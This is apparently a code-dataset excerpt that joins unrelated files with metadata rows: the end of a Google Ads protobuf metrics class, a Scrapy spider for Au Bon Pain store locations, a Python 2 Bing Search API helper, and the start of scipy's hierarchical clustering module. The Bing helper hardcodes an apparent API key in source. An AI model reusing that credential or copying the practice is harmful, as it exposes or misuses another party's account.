proto.DOUBLE, number=172, optional=True
)
cross_device_conversions = proto.Field(
proto.DOUBLE, number=173, optional=True
)
ctr = proto.Field(proto.DOUBLE, number=174, optional=True)
current_model_attributed_conversions = proto.Field(
proto.DOUBLE, number=175, optional=True
)
current_model_attributed_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=176, optional=True
)
current_model_attributed_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=177, optional=True
)
current_model_attributed_conversions_value = proto.Field(
proto.DOUBLE, number=178, optional=True
)
current_model_attributed_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=179, optional=True
)
engagement_rate = proto.Field(proto.DOUBLE, number=180, optional=True)
engagements = proto.Field(proto.INT64, number=181, optional=True)
hotel_average_lead_value_micros = proto.Field(
proto.DOUBLE, number=213, optional=True
)
hotel_price_difference_percentage = proto.Field(
proto.DOUBLE, number=214, optional=True
)
hotel_eligible_impressions = proto.Field(
proto.INT64, number=215, optional=True
)
historical_creative_quality_score = proto.Field(
proto.ENUM,
number=80,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_landing_page_quality_score = proto.Field(
proto.ENUM,
number=81,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_quality_score = proto.Field(
proto.INT64, number=216, optional=True
)
historical_search_predicted_ctr = proto.Field(
proto.ENUM,
number=83,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
gmail_forwards = proto.Field(proto.INT64, number=217, optional=True)
gmail_saves = proto.Field(proto.INT64, number=218, optional=True)
gmail_secondary_clicks = proto.Field(proto.INT64, number=219, optional=True)
impressions_from_store_reach = proto.Field(
proto.INT64, number=220, optional=True
)
impressions = proto.Field(proto.INT64, number=221, optional=True)
interaction_rate = proto.Field(proto.DOUBLE, number=222, optional=True)
interactions = proto.Field(proto.INT64, number=223, optional=True)
interaction_event_types = proto.RepeatedField(
proto.ENUM,
number=100,
enum=interaction_event_type.InteractionEventTypeEnum.InteractionEventType,
)
invalid_click_rate = proto.Field(proto.DOUBLE, number=224, optional=True)
invalid_clicks = proto.Field(proto.INT64, number=225, optional=True)
message_chats = proto.Field(proto.INT64, number=226, optional=True)
message_impressions = proto.Field(proto.INT64, number=227, optional=True)
message_chat_rate = proto.Field(proto.DOUBLE, number=228, optional=True)
mobile_friendly_clicks_percentage = proto.Field(
proto.DOUBLE, number=229, optional=True
)
organic_clicks = proto.Field(proto.INT64, number=230, optional=True)
organic_clicks_per_query = proto.Field(
proto.DOUBLE, number=231, optional=True
)
organic_impressions = proto.Field(proto.INT64, number=232, optional=True)
organic_impressions_per_query = proto.Field(
proto.DOUBLE, number=233, optional=True
)
organic_queries = proto.Field(proto.INT64, number=234, optional=True)
percent_new_visitors = proto.Field(proto.DOUBLE, number=235, optional=True)
phone_calls = proto.Field(proto.INT64, number=236, optional=True)
phone_impressions = proto.Field(proto.INT64, number=237, optional=True)
phone_through_rate = proto.Field(proto.DOUBLE, number=238, optional=True)
relative_ctr = proto.Field(proto.DOUBLE, number=239, optional=True)
search_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=136, optional=True
)
search_budget_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=137, optional=True
)
search_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=138, optional=True
)
search_budget_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=139, optional=True
)
search_click_share = proto.Field(proto.DOUBLE, number=140, optional=True)
search_exact_match_impression_share = proto.Field(
proto.DOUBLE, number=141, optional=True
)
search_impression_share = proto.Field(
proto.DOUBLE, number=142, optional=True
)
search_rank_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=143, optional=True
)
search_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=144, optional=True
)
search_rank_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=145, optional=True
)
search_top_impression_share = proto.Field(
proto.DOUBLE, number=146, optional=True
)
speed_score = proto.Field(proto.INT64, number=147, optional=True)
top_impression_percentage = proto.Field(
proto.DOUBLE, number=148, optional=True
)
valid_accelerated_mobile_pages_clicks_percentage = proto.Field(
proto.DOUBLE, number=149, optional=True
)
value_per_all_conversions = proto.Field(
proto.DOUBLE, number=150, optional=True
)
value_per_all_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=244, optional=True
)
value_per_conversion = proto.Field(proto.DOUBLE, number=151, optional=True)
value_per_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=245, optional=True
)
value_per_current_model_attributed_conversion = proto.Field(
proto.DOUBLE, number=152, optional=True
)
video_quartile_p100_rate = proto.Field(
proto.DOUBLE, number=132, optional=True
)
video_quartile_p25_rate = proto.Field(
proto.DOUBLE, number=133, optional=True
)
video_quartile_p50_rate = proto.Field(
proto.DOUBLE, number=134, optional=True
)
video_quartile_p75_rate = proto.Field(
proto.DOUBLE, number=135, optional=True
)
video_view_rate = proto.Field(proto.DOUBLE, number=153, optional=True)
video_views = proto.Field(proto.INT64, number=154, optional=True)
view_through_conversions = proto.Field(
proto.INT64, number=155, optional=True
)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 7,806,873,479,053,634,000 | 47.843607 | 126 | 0.65375 | false |
iandees/all-the-places | locations/spiders/aubonpain.py | 1 | 2580 | import scrapy
import re
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class AuBonPainSpider(scrapy.Spider):
name = "aubonpain"
download_delay = 0.5
allowed_domains = [
"www.aubonpain.com",
]
start_urls = (
'https://www.aubonpain.com/stores/all-stores',
)
def parse_hours(self, items):
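# Judging from the keys used below, each entry of `items` is expected to look roughly
# like {"Day": "Monday", "Open": "7:00 AM", "Close": "9:00 PM"}; the example values
# here are illustrative, not taken from the site.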
opening_hours = OpeningHours()
for day in items:
open_time = day["Open"]
close_time = day["Close"]
if close_time == 'Closed' or open_time == 'Closed':
continue
elif close_time == 'Open 24 Hrs' or open_time == 'Open 24 Hrs':
open_time = '12:00 AM'
close_time = '12:00 AM'
elif close_time == 'Open for Special Events':
continue
opening_hours.add_range(day=day["Day"][:2],
open_time=open_time,
close_time=close_time,
time_format='%I:%M %p')
return opening_hours.as_opening_hours()
def parse_store(self, response):
ref = re.findall(r"[^(\/)]+$", response.url)[0]
scripts = "".join(response.xpath('//script/text()').extract())
lat, lon = re.search(r'.*Microsoft.Maps.Location\(([0-9.-]*),\s+([0-9-.]*)\).*', scripts).groups()
address1, address2 = response.xpath('//dt[contains(text(), "Address")]/following-sibling::dd/text()').extract()
city, state, zipcode = re.search(r'^(.*),\s+([a-z]{2})\s+([0-9]+)$', address2.strip(), re.IGNORECASE).groups()
properties = {
'addr_full': address1.strip(', '),
'phone': response.xpath('//dt[contains(text(), "Phone")]/following-sibling::dd/a/text()').extract_first(),
'city': city,
'state': state,
'postcode': zipcode,
'ref': ref,
'website': response.url,
'lat': float(lat),
'lon': float(lon),
}
hours = json.loads(re.search(r'.*var\shours\s*=\s*(.*?);.*', scripts).groups()[0])
hours = self.parse_hours(hours)
if hours:
properties['opening_hours'] = hours
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//section/div/div//a[contains(@href, "stores")]/@href').extract()
for url in urls:
url = url.replace('\r\n', '')
yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
| mit | -4,718,689,655,118,514,000 | 35.857143 | 119 | 0.527907 | false |
douglasbgatti/rango-tutorial | tango_with_django_project/rango/bing_search.py | 1 | 2360 | import json
import urllib, urllib2
BING_API_KEY = '6uAUnyT0WuPBRqv5+AZIuWrpNsKJ++t0E9Sp9DDkh3Q'
def run_query(search_terms):
# Specify the base URL for the Bing Search API.
root_url = 'https://api.datamarket.azure.com/Bing/Search/v1/'
source = 'Web'
# Specify how many results we wish to be returned per page.
# Offset specifies where in the results list to start from.
# With results_per_page = 10 and offset = 11, this would start from page 2.
results_per_page = 10
offset = 11
# Wrap quotes around our query terms as required by the Bing API.
# The query we will then use is stored within variable query.
query = "'{0}'".format(search_terms)
query = urllib.quote(query)
# Construct the latter part of our request's URL.
# Sets the format of the response to JSON and sets other properties.
search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format(
root_url,
source,
results_per_page,
offset,
query)
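# For example, with search_terms = 'django' the URL built above would be:
# https://api.datamarket.azure.com/Bing/Search/v1/Web?$format=json&$top=10&$skip=11&Query=%27django%27
# (shown only to illustrate the format string; the query term is hypothetical).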
# Setup authentication with the Bing servers.
# The username MUST be a blank string; the API key is supplied as the password.
username = ''
# Create a 'password manager' which handles authentication for us.
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, search_url, username, BING_API_KEY)
# Create our results list which we'll populate.
results = []
try:
# Prepare for connecting to Bing's servers.
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
# Connect to the server and read the response generated.
response = urllib2.urlopen(search_url).read()
# Convert the string response to a Python dictionary object.
json_response = json.loads(response)
# Loop through each page returned, populating out results list.
for result in json_response['d']['results']:
results.append({
'title': result['Title'],
'link': result['Url'],
'summary': result['Description']})
# Catch a URLError exception - something went wrong when connecting!
except urllib2.URLError, e:
print "Error when querying the Bing API: ", e
# Return the list of results to the calling function.
return results | apache-2.0 | 702,510,726,307,883,600 | 34.238806 | 79 | 0.659322 | false |
njwilson23/scipy | scipy/cluster/hierarchy.py | 1 | 91969 | """
========================================================
Hierarchical clustering (:mod:`scipy.cluster.hierarchy`)
========================================================
.. currentmodule:: scipy.cluster.hierarchy
These functions cut hierarchical clusterings into flat clusterings
or find the roots of the forest formed by a cut by providing the flat
cluster ids of each observation.
.. autosummary::
:toctree: generated/
fcluster
fclusterdata
leaders
These are routines for agglomerative clustering.
.. autosummary::
:toctree: generated/
linkage
single
complete
average
weighted
centroid
median
ward
These routines compute statistics on hierarchies.
.. autosummary::
:toctree: generated/
cophenet
from_mlab_linkage
inconsistent
maxinconsts
maxdists
maxRstat
to_mlab_linkage
Routines for visualizing flat clusters.
.. autosummary::
:toctree: generated/
dendrogram
These are data structures and routines for representing hierarchies as
tree objects.
.. autosummary::
:toctree: generated/
ClusterNode
leaves_list
to_tree
These are predicates for checking the validity of linkage and
inconsistency matrices as well as for checking isomorphism of two
flat cluster assignments.
.. autosummary::
:toctree: generated/
is_valid_im
is_valid_linkage
is_isomorphic
is_monotonic
correspond
num_obs_linkage
Utility routines for plotting:
.. autosummary::
:toctree: generated/
set_link_color_palette
References
----------
.. [1] "Statistics toolbox." API Reference Documentation. The MathWorks.
http://www.mathworks.com/access/helpdesk/help/toolbox/stats/.
Accessed October 1, 2007.
.. [2] "Hierarchical clustering." API Reference Documentation.
The Wolfram Research, Inc.
http://reference.wolfram.com/mathematica/HierarchicalClustering/tutorial/
HierarchicalClustering.html.
Accessed October 1, 2007.
.. [3] Gower, JC and Ross, GJS. "Minimum Spanning Trees and Single Linkage
Cluster Analysis." Applied Statistics. 18(1): pp. 54--64. 1969.
.. [4] Ward Jr, JH. "Hierarchical grouping to optimize an objective
function." Journal of the American Statistical Association. 58(301):
pp. 236--44. 1963.
.. [5] Johnson, SC. "Hierarchical clustering schemes." Psychometrika.
32(2): pp. 241--54. 1966.
.. [6] Sneath, PH and Sokal, RR. "Numerical taxonomy." Nature. 193: pp.
855--60. 1962.
.. [7] Batagelj, V. "Comparing resemblance measures." Journal of
Classification. 12: pp. 73--90. 1995.
.. [8] Sokal, RR and Michener, CD. "A statistical method for evaluating
systematic relationships." Scientific Bulletins. 38(22):
pp. 1409--38. 1958.
.. [9] Edelbrock, C. "Mixture model tests of hierarchical clustering
algorithms: the problem of classifying everybody." Multivariate
Behavioral Research. 14: pp. 367--84. 1979.
.. [10] Jain, A., and Dubes, R., "Algorithms for Clustering Data."
Prentice-Hall. Englewood Cliffs, NJ. 1988.
.. [11] Fisher, RA "The use of multiple measurements in taxonomic
problems." Annals of Eugenics, 7(2): 179-188. 1936
* MATLAB and MathWorks are registered trademarks of The MathWorks, Inc.
* Mathematica is a registered trademark of The Wolfram Research, Inc.
"""
from __future__ import division, print_function, absolute_import
# Copyright (C) Damian Eads, 2007-2008. New BSD License.
# hierarchy.py (derived from cluster.py, http://scipy-cluster.googlecode.com)
#
# Author: Damian Eads
# Date: September 22, 2007
#
# Copyright (c) 2007, 2008, Damian Eads
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# - Neither the name of the author nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import warnings
import numpy as np
from . import _hierarchy
import scipy.spatial.distance as distance
from scipy._lib.six import string_types
from scipy._lib.six import xrange
_cpy_non_euclid_methods = {'single': 0, 'complete': 1, 'average': 2,
'weighted': 6}
_cpy_euclid_methods = {'centroid': 3, 'median': 4, 'ward': 5}
_cpy_linkage_methods = set(_cpy_non_euclid_methods.keys()).union(
set(_cpy_euclid_methods.keys()))
__all__ = ['ClusterNode', 'average', 'centroid', 'complete', 'cophenet',
'correspond', 'dendrogram', 'fcluster', 'fclusterdata',
'from_mlab_linkage', 'inconsistent', 'is_isomorphic',
'is_monotonic', 'is_valid_im', 'is_valid_linkage', 'leaders',
'leaves_list', 'linkage', 'maxRstat', 'maxdists', 'maxinconsts',
'median', 'num_obs_linkage', 'set_link_color_palette', 'single',
'to_mlab_linkage', 'to_tree', 'ward', 'weighted', 'distance']
def _warning(s):
warnings.warn('scipy.cluster: %s' % s, stacklevel=3)
def _copy_array_if_base_present(a):
"""
Copies the array if its base points to a parent array.
"""
if a.base is not None:
return a.copy()
elif np.issubsctype(a, np.float32):
return np.array(a, dtype=np.double)
else:
return a
def _copy_arrays_if_base_present(T):
"""
Accepts a tuple of arrays T. Copies the array T[i] if its base array
points to an actual array. Otherwise, the reference is just copied.
This is useful if the arrays are being passed to a C function that
does not do proper striding.
"""
l = [_copy_array_if_base_present(a) for a in T]
return l
def _randdm(pnts):
""" Generates a random distance matrix stored in condensed form. A
pnts * (pnts - 1) / 2 sized vector is returned.
"""
if pnts >= 2:
D = np.random.rand(pnts * (pnts - 1) // 2)
else:
raise ValueError("The number of points in the distance matrix "
"must be at least 2.")
return D
def single(y):
"""
Performs single/min/nearest linkage on the condensed distance matrix ``y``
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
The linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='single', metric='euclidean')
def complete(y):
"""
Performs complete/max/farthest point linkage on a condensed distance matrix
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage
"""
return linkage(y, method='complete', metric='euclidean')
def average(y):
"""
Performs average/UPGMA linkage on a condensed distance matrix
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='average', metric='euclidean')
def weighted(y):
"""
Performs weighted/WPGMA linkage on the condensed distance matrix.
See ``linkage`` for more information on the return
structure and algorithm.
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage : for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='weighted', metric='euclidean')
def centroid(y):
"""
Performs centroid/UPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = centroid(y)``
Performs centroid/UPGMC linkage on the condensed distance
matrix ``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = centroid(X)``
Performs centroid/UPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See ``linkage``
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='centroid', metric='euclidean')
def median(y):
"""
Performs median/WPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = median(y)``
Performs median/WPGMC linkage on the condensed distance matrix
``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = median(X)``
Performs median/WPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See linkage
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='median', metric='euclidean')
def ward(y):
"""
Performs Ward's linkage on a condensed or redundant distance matrix.
See linkage for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = ward(y)``
Performs Ward's linkage on the condensed distance matrix ``Z``. See
linkage for more information on the return structure and
algorithm.
2. ``Z = ward(X)``
Performs Ward's linkage on the observation matrix ``X`` using
Euclidean distance as the distance metric. See linkage for more
information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
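Examples
--------
A minimal illustrative sketch on a hypothetical observation matrix:

>>> import numpy as np
>>> from scipy.cluster.hierarchy import ward
>>> X = np.array([[0., 0.], [0., 1.], [1., 0.], [4., 4.], [4., 5.]])
>>> Z = ward(X)                  # equivalent to linkage(X, method='ward')
>>> Z.shape
(4, 4)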
"""
return linkage(y, method='ward', metric='euclidean')
def linkage(y, method='single', metric='euclidean'):
"""
Performs hierarchical/agglomerative clustering on the condensed
distance matrix y.
y must be a :math:`{n \\choose 2}` sized
vector where n is the number of original observations paired
in the distance matrix. The behavior of this function is very
similar to the MATLAB linkage function.
An :math:`(n-1)` by 4 matrix ``Z`` is returned. At the
:math:`i`-th iteration, clusters with indices ``Z[i, 0]`` and
``Z[i, 1]`` are combined to form cluster :math:`n + i`. A
cluster with an index less than :math:`n` corresponds to one of
the :math:`n` original observations. The distance between
clusters ``Z[i, 0]`` and ``Z[i, 1]`` is given by ``Z[i, 2]``. The
fourth value ``Z[i, 3]`` represents the number of original
observations in the newly formed cluster.
The following linkage methods are used to compute the distance
:math:`d(s, t)` between two clusters :math:`s` and
:math:`t`. The algorithm begins with a forest of clusters that
have yet to be used in the hierarchy being formed. When two
clusters :math:`s` and :math:`t` from this forest are combined
into a single cluster :math:`u`, :math:`s` and :math:`t` are
removed from the forest, and :math:`u` is added to the
forest. When only one cluster remains in the forest, the algorithm
stops, and this cluster becomes the root.
A distance matrix is maintained at each iteration. The ``d[i,j]``
entry corresponds to the distance between cluster :math:`i` and
:math:`j` in the original forest.
At each iteration, the algorithm must update the distance matrix
to reflect the distance of the newly formed cluster u with the
remaining clusters in the forest.
Suppose there are :math:`|u|` original observations
:math:`u[0], \\ldots, u[|u|-1]` in cluster :math:`u` and
:math:`|v|` original objects :math:`v[0], \\ldots, v[|v|-1]` in
cluster :math:`v`. Recall :math:`s` and :math:`t` are
combined to form cluster :math:`u`. Let :math:`v` be any
remaining cluster in the forest that is not :math:`u`.
The following are methods for calculating the distance between the
newly formed cluster :math:`u` and each :math:`v`.
* method='single' assigns
.. math::
d(u,v) = \\min(dist(u[i],v[j]))
for all points :math:`i` in cluster :math:`u` and
:math:`j` in cluster :math:`v`. This is also known as the
Nearest Point Algorithm.
* method='complete' assigns
.. math::
d(u, v) = \\max(dist(u[i],v[j]))
for all points :math:`i` in cluster u and :math:`j` in
cluster :math:`v`. This is also known as the Farthest Point
Algorithm or Voorhees Algorithm.
* method='average' assigns
.. math::
d(u,v) = \\sum_{ij} \\frac{d(u[i], v[j])}
{(|u|*|v|)}
for all points :math:`i` and :math:`j` where :math:`|u|`
and :math:`|v|` are the cardinalities of clusters :math:`u`
and :math:`v`, respectively. This is also called the UPGMA
algorithm.
* method='weighted' assigns
.. math::
d(u,v) = (dist(s,v) + dist(t,v))/2
where cluster u was formed with clusters s and t and v
is a remaining cluster in the forest (also called WPGMA).
* method='centroid' assigns
.. math::
dist(s,t) = ||c_s-c_t||_2
where :math:`c_s` and :math:`c_t` are the centroids of
clusters :math:`s` and :math:`t`, respectively. When two
clusters :math:`s` and :math:`t` are combined into a new
cluster :math:`u`, the new centroid is computed over all the
original objects in clusters :math:`s` and :math:`t`. The
distance then becomes the Euclidean distance between the
centroid of :math:`u` and the centroid of a remaining cluster
:math:`v` in the forest. This is also known as the UPGMC
algorithm.
* method='median' assigns :math:`d(s,t)` like the ``centroid``
method. When two clusters :math:`s` and :math:`t` are combined
into a new cluster :math:`u`, the average of centroids s and t
gives the new centroid :math:`u`. This is also known as the
WPGMC algorithm.
* method='ward' uses the Ward variance minimization algorithm.
The new entry :math:`d(u,v)` is computed as follows,
.. math::
d(u,v) = \\sqrt{\\frac{|v|+|s|}
{T}d(v,s)^2
+ \\frac{|v|+|t|}
{T}d(v,t)^2
- \\frac{|v|}
{T}d(s,t)^2}
where :math:`u` is the newly joined cluster consisting of
clusters :math:`s` and :math:`t`, :math:`v` is an unused
cluster in the forest, :math:`T=|v|+|s|+|t|`, and
:math:`|*|` is the cardinality of its argument. This is also
known as the incremental algorithm.
Warning: When the minimum distance pair in the forest is chosen, there
may be two or more pairs with the same minimum distance. This
implementation may choose a different minimum than the MATLAB
version.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed distance matrix
is a flat array containing the upper triangular of the distance matrix.
This is the form that ``pdist`` returns. Alternatively, a collection of
:math:`m` observation vectors in n dimensions may be passed as an
:math:`m` by :math:`n` array.
method : str, optional
The linkage algorithm to use. See the ``Linkage Methods`` section below
for full descriptions.
metric : str or function, optional
The distance metric to use in the case that y is a collection of
observation vectors; ignored otherwise. See the ``distance.pdist``
function for a list of valid distance metrics. A custom distance
function can also be used. See the ``distance.pdist`` function for
details.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
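Examples
--------
An illustrative sketch (the observations below are hypothetical); it
assumes ``scipy.spatial.distance.pdist`` for building the condensed
input:

>>> from scipy.spatial.distance import pdist
>>> from scipy.cluster.hierarchy import linkage
>>> X = [[0, 0], [0, 1], [1, 0], [4, 4], [4, 5]]
>>> Z = linkage(pdist(X), method='average')
>>> Z.shape                      # (n - 1) rows, 4 columns
(4, 4)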
"""
if not isinstance(method, string_types):
raise TypeError("Argument 'method' must be a string.")
y = _convert_to_double(np.asarray(y, order='c'))
s = y.shape
if len(s) == 1:
distance.is_valid_y(y, throw=True, name='y')
d = distance.num_obs_y(y)
if method not in _cpy_non_euclid_methods:
raise ValueError("Valid methods when the raw observations are "
"omitted are 'single', 'complete', 'weighted', "
"and 'average'.")
# The underlying C code does not support strided arrays, so copy if needed.
[y] = _copy_arrays_if_base_present([y])
Z = np.zeros((d - 1, 4))
if method == 'single':
_hierarchy.slink(y, Z, int(d))
else:
_hierarchy.linkage(y, Z, int(d),
int(_cpy_non_euclid_methods[method]))
elif len(s) == 2:
X = y
n = s[0]
if method not in _cpy_linkage_methods:
raise ValueError('Invalid method: %s' % method)
if method in _cpy_non_euclid_methods:
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
if method == 'single':
_hierarchy.slink(dm, Z, n)
else:
_hierarchy.linkage(dm, Z, n,
int(_cpy_non_euclid_methods[method]))
elif method in _cpy_euclid_methods:
if metric != 'euclidean':
raise ValueError(("Method '%s' requires the distance metric "
"to be euclidean") % method)
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
_hierarchy.linkage(dm, Z, n,
int(_cpy_euclid_methods[method]))
return Z
class ClusterNode:
"""
A tree node class for representing a cluster.
Leaf nodes correspond to original observations, while non-leaf nodes
correspond to non-singleton clusters.
The to_tree function converts a matrix returned by the linkage
function into an easy-to-use tree representation.
See Also
--------
to_tree : for converting a linkage matrix ``Z`` into a tree object.
"""
def __init__(self, id, left=None, right=None, dist=0, count=1):
if id < 0:
raise ValueError('The id must be non-negative.')
if dist < 0:
raise ValueError('The distance must be non-negative.')
if (left is None and right is not None) or \
(left is not None and right is None):
raise ValueError('Only full or proper binary trees are permitted.'
' This node has one child.')
if count < 1:
raise ValueError('A cluster must contain at least one original '
'observation.')
self.id = id
self.left = left
self.right = right
self.dist = dist
if self.left is None:
self.count = count
else:
self.count = left.count + right.count
def get_id(self):
"""
The identifier of the target node.
For ``0 <= i < n``, `i` corresponds to original observation i.
For ``n <= i < 2n-1``, `i` corresponds to non-singleton cluster formed
at iteration ``i-n``.
Returns
-------
id : int
The identifier of the target node.
"""
return self.id
def get_count(self):
"""
The number of leaf nodes (original observations) belonging to
the cluster node nd. If the target node is a leaf, 1 is
returned.
Returns
-------
get_count : int
The number of leaf nodes below the target node.
"""
return self.count
def get_left(self):
"""
Return a reference to the left child tree object.
Returns
-------
left : ClusterNode
The left child of the target node. If the node is a leaf,
None is returned.
"""
return self.left
def get_right(self):
"""
Returns a reference to the right child tree object.
Returns
-------
right : ClusterNode
The right child of the target node. If the node is a leaf,
None is returned.
"""
return self.right
def is_leaf(self):
"""
Returns True if the target node is a leaf.
Returns
-------
leafness : bool
True if the target node is a leaf node.
"""
return self.left is None
def pre_order(self, func=(lambda x: x.id)):
"""
Performs pre-order traversal without recursive function calls.
When a leaf node is first encountered, ``func`` is called with
the leaf node as its argument, and its result is appended to
the list.
For example, the statement::
ids = root.pre_order(lambda x: x.id)
returns a list of the node ids corresponding to the leaf nodes
of the tree as they appear from left to right.
Parameters
----------
func : function
Applied to each leaf ClusterNode object in the pre-order traversal.
Given the i'th leaf node in the pre-order traversal ``n[i]``, the
result of func(n[i]) is stored in L[i]. If not provided, the index
of the original observation to which the node corresponds is used.
Returns
-------
L : list
The pre-order traversal.
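Examples
--------
An illustrative sketch using a hypothetical condensed distance matrix:

>>> from scipy.cluster.hierarchy import linkage, to_tree
>>> Z = linkage([2., 8., 10., 8., 10., 2.], method='single')
>>> root = to_tree(Z)
>>> sorted(root.pre_order())     # ids of the leaves below the root
[0, 1, 2, 3]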
"""
# Do a preorder traversal, caching the result. To avoid having to do
# recursion, we'll store the previous index we've visited in a vector.
n = self.count
curNode = [None] * (2 * n)
lvisited = set()
rvisited = set()
curNode[0] = self
k = 0
preorder = []
while k >= 0:
nd = curNode[k]
ndid = nd.id
if nd.is_leaf():
preorder.append(func(nd))
k = k - 1
else:
if ndid not in lvisited:
curNode[k + 1] = nd.left
lvisited.add(ndid)
k = k + 1
elif ndid not in rvisited:
curNode[k + 1] = nd.right
rvisited.add(ndid)
k = k + 1
# If we've visited the left and right of this non-leaf
# node already, go up in the tree.
else:
k = k - 1
return preorder
_cnode_bare = ClusterNode(0)
_cnode_type = type(ClusterNode)
def to_tree(Z, rd=False):
"""
Converts a hierarchical clustering encoded in the matrix ``Z`` (by
linkage) into an easy-to-use tree object.
The reference r to the root ClusterNode object is returned.
Each ClusterNode object has a left, right, dist, id, and count
attribute. The left and right attributes point to ClusterNode objects
that were combined to generate the cluster. If both are None then
the ClusterNode object is a leaf node, its count must be 1, and its
distance is meaningless but set to 0.
Note: This function is provided for the convenience of the library
user. ClusterNodes are not used as input to any of the functions in this
library.
Parameters
----------
Z : ndarray
The linkage matrix in proper form (see the ``linkage``
function documentation).
rd : bool, optional
When False, a reference to the root ClusterNode object is
returned. Otherwise, a tuple (r,d) is returned. ``r`` is a
reference to the root node while ``d`` is a dictionary
mapping cluster ids to ClusterNode references. If a cluster id is
less than n, then it corresponds to a singleton cluster
(leaf node). See ``linkage`` for more information on the
